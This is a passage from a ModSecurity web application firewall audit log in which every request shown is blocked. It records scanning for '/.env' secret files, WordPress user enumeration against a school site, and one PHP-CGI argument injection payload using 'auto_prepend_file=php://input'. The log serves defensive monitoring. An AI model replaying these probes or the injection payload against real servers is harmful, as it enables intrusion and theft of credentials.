(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b5cc32f-Z-- --9099614f-A-- [23/May/2025:16:05:12 +0700] aDA6SG_WNRyhaqaKDLxI-AAAANQ 103.236.140.4 54292 103.236.140.4 8181 --9099614f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/33.0.1750.152 Chrome/33.0.1750.152 Safari/537.36 Accept-Charset: utf-8 --9099614f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9099614f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991112056175 722 (- - -) Stopwatch2: 1747991112056175 722; combined=294, p1=256, p2=0, p3=0, p4=0, p5=37, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9099614f-Z-- --69854a1d-A-- [23/May/2025:16:09:47 +0700] aDA7Wx67_KloOut96EkUmwAAAIs 103.236.140.4 35752 103.236.140.4 8181 --69854a1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/80.0.180 Chrome/74.0.3729.180 Safari/537.36 Accept-Charset: utf-8 --69854a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69854a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991387570296 656 (- - -) Stopwatch2: 1747991387570296 656; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69854a1d-Z-- --0b69225a-A-- [23/May/2025:16:11:03 +0700] aDA7p2_WNRyhaqaKDLxN_AAAAMI 103.236.140.4 38498 103.236.140.4 8181 --0b69225a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0b69225a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b69225a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991463959123 759 (- - -) Stopwatch2: 1747991463959123 759; combined=314, p1=277, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b69225a-Z-- --e4e5614e-A-- [23/May/2025:16:11:05 +0700] aDA7qbz70bfNdlplZZPWnAAAAFA 103.236.140.4 38566 103.236.140.4 8181 --e4e5614e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e4e5614e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4e5614e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991465791524 691 (- - -) Stopwatch2: 1747991465791524 691; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4e5614e-Z-- --02fdb633-A-- [23/May/2025:16:19:15 +0700] aDA9k1YzwfxII7zMfyHf2wAAAAI 103.236.140.4 55876 103.236.140.4 8181 --02fdb633-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.93.31.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.93.31.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02fdb633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02fdb633-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747991955483126 2542 (- - -) Stopwatch2: 1747991955483126 2542; combined=1167, p1=439, p2=698, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02fdb633-Z-- --c55fde24-A-- [23/May/2025:16:44:52 +0700] aDBDlG_WNRyhaqaKDLx2gAAAANc 103.236.140.4 53964 103.236.140.4 8181 --c55fde24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --c55fde24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c55fde24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993492740546 742 (- - -) Stopwatch2: 1747993492740546 742; combined=313, p1=270, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c55fde24-Z-- --f110d511-A-- [23/May/2025:16:44:58 +0700] aDBDmh67_KloOut96Ek8_AAAAIo 103.236.140.4 54148 103.236.140.4 8181 --f110d511-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --f110d511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f110d511-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993498090637 720 (- - -) Stopwatch2: 1747993498090637 720; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f110d511-Z-- --ed237051-A-- [23/May/2025:16:48:49 +0700] aDBEgW_WNRyhaqaKDLx6PAAAAMY 103.236.140.4 34102 103.236.140.4 8181 --ed237051-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Max) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ed237051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed237051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993729572997 666 (- - -) Stopwatch2: 1747993729572997 666; combined=237, p1=207, p2=0, p3=0, p4=0, p5=30, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed237051-Z-- --cb0d486c-A-- [23/May/2025:17:09:50 +0700] aDBJbh67_KloOut96ElebgAAAIk 103.236.140.4 50348 103.236.140.4 8181 --cb0d486c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.1.50.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.1.50.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb0d486c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb0d486c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747994990429035 3587 (- - -) Stopwatch2: 1747994990429035 3587; combined=1913, p1=602, p2=1280, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb0d486c-Z-- --dffe181b-A-- [23/May/2025:17:15:45 +0700] aDBK0bz70bfNdlplZZMXxAAAAEs 103.236.140.4 35972 103.236.140.4 8181 --dffe181b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.74.157.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.74.157.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dffe181b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dffe181b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747995345789339 2780 (- - -) Stopwatch2: 1747995345789339 2780; combined=1388, p1=416, p2=948, p3=0, p4=0, p5=24, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dffe181b-Z-- --dfaaef15-A-- [23/May/2025:17:32:00 +0700] aDBOoLz70bfNdlplZZMnSwAAAEc 103.236.140.4 42898 103.236.140.4 8181 --dfaaef15-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 114.43.135.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 114.43.135.35 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --dfaaef15-C-- --dfaaef15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfaaef15-E-- --dfaaef15-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747996320619498 5572 (- - -) Stopwatch2: 1747996320619498 5572; combined=3906, p1=469, p2=3395, p3=0, p4=0, p5=42, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfaaef15-Z-- --c4ddd904-A-- [23/May/2025:17:52:17 +0700] aDBTYVYzwfxII7zMfyEvbAAAAAo 103.236.140.4 57678 103.236.140.4 8181 --c4ddd904-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.187.222.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.187.222.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4ddd904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ddd904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747997537162719 3268 (- - -) Stopwatch2: 1747997537162719 3268; combined=1718, p1=563, p2=1128, p3=0, p4=0, p5=26, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ddd904-Z-- --1f3ad246-A-- [23/May/2025:18:09:31 +0700] aDBXa2_WNRyhaqaKDLzRDwAAAMw 103.236.140.4 37792 103.236.140.4 8181 --1f3ad246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.98.147.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.98.147.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1f3ad246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f3ad246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747998571510710 3447 (- - -) Stopwatch2: 1747998571510710 3447; combined=1965, p1=641, p2=1292, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f3ad246-Z-- --78dd897e-A-- [23/May/2025:18:37:14 +0700] aDBd6lYzwfxII7zMfyFU0AAAABI 103.236.140.4 40430 103.236.140.4 8181 --78dd897e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept-Charset: utf-8 --78dd897e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dd897e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748000234685810 631 (- - -) Stopwatch2: 1748000234685810 631; combined=258, p1=225, p2=0, p3=0, p4=0, p5=33, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dd897e-Z-- --0f06453a-A-- [23/May/2025:18:53:03 +0700] aDBhn7z70bfNdlplZZN6cAAAAFc 103.236.140.4 46660 103.236.140.4 8181 --0f06453a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --0f06453a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f06453a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748001183278726 1261 (- - -) Stopwatch2: 1748001183278726 1261; combined=387, p1=346, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f06453a-Z-- --88e4db3e-A-- [23/May/2025:18:59:28 +0700] aDBjILz70bfNdlplZZOB_AAAAFY 103.236.140.4 60548 103.236.140.4 8181 --88e4db3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.97.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.97.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88e4db3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e4db3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748001568016653 2606 (- - -) Stopwatch2: 1748001568016653 2606; combined=1382, p1=410, p2=949, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e4db3e-Z-- --3327254a-A-- [23/May/2025:19:26:33 +0700] aDBpebz70bfNdlplZZObvQAAAEQ 103.236.140.4 34854 103.236.140.4 8181 --3327254a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.216.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.216.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3327254a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3327254a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748003193525980 2525 (- - -) Stopwatch2: 1748003193525980 2525; combined=1133, p1=365, p2=740, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3327254a-Z-- --6116dc34-A-- [23/May/2025:19:26:48 +0700] aDBpiLz70bfNdlplZZOb0AAAAEg 103.236.140.4 35392 103.236.140.4 8181 --6116dc34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.212.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.212.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6116dc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6116dc34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag 